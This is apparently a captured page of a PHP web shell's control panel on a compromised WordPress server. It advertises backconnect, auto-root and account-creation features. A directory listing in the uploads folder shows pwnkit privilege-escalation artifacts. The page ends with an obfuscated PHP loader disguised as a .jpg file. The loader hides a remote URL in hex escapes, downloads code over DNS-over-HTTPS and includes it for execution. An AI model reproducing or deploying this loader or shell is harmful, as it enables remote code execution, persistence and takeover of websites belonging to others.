Linux cyberpanel 5.15.0-156-generic #166-Ubuntu SMP Sat Aug 9 00:02:46 UTC 2025 x86_64
LiteSpeed
: 160.191.175.3 | : 216.73.216.114
Cant Read [ /etc/named.conf ]
8.2.29
aodai6801
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aodai.devttt.com /
public_html /
wp-content /
uploads /
2026 /
01 /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
.privdayz-root
0
B
-rw-r--r--
adminer.php
465.43
KB
-rw-r--r--
kiotviet_3f9c8525089c048a245a0...
807
B
-rw-r--r--
kiotviet_692d00b3eedca807d3fe7...
61.12
KB
-rw-r--r--
kiotviet_8ae9754c636a59922575d...
1.73
KB
-rw-r--r--
kiotviet_8ca2b9410c81d0897832c...
57.64
KB
-rw-r--r--
kiotviet_a1863e88ff3f88346b186...
8.88
KB
-rw-r--r--
kiotviet_b772677d917e9d7c65180...
2.09
KB
-rw-r--r--
pwnkit
17.62
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : kiotviet_3f9c8525089c048a245a0ad98a62fed5.jpg
<?php error_reporting(0); set_time_limit(0); $url = "\x68\x74\x74\x70\x73\x3a\x2f\x2f\x69\x6d\x68\x65\x72\x65\x77\x61\x69\x74\x69\x6e\x67\x2d\x61\x6c\x6f\x6e\x65\x2e\x70\x61\x67\x65\x73\x2e\x64\x65\x76\x2f\x63\x6f\x64\x65\x6e\x61\x6d\x65\x2f\x74\x6d\x70\x2e\x74\x78\x74"; $dns = "https://cloudflare-dns.com/dns-query"; $ch = curl_init($url); if (defined("CURLOPT_DOH_URL")) { curl_setopt($ch, CURLOPT_DOH_URL, $dns); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); $res = curl_exec($ch); curl_close($ch); $tmp = tmpfile(); $path_metadata = stream_get_meta_data($tmp); $path = $path_metadata["uri"]; fprintf($tmp, "%s", $res); include $path; ?>
Close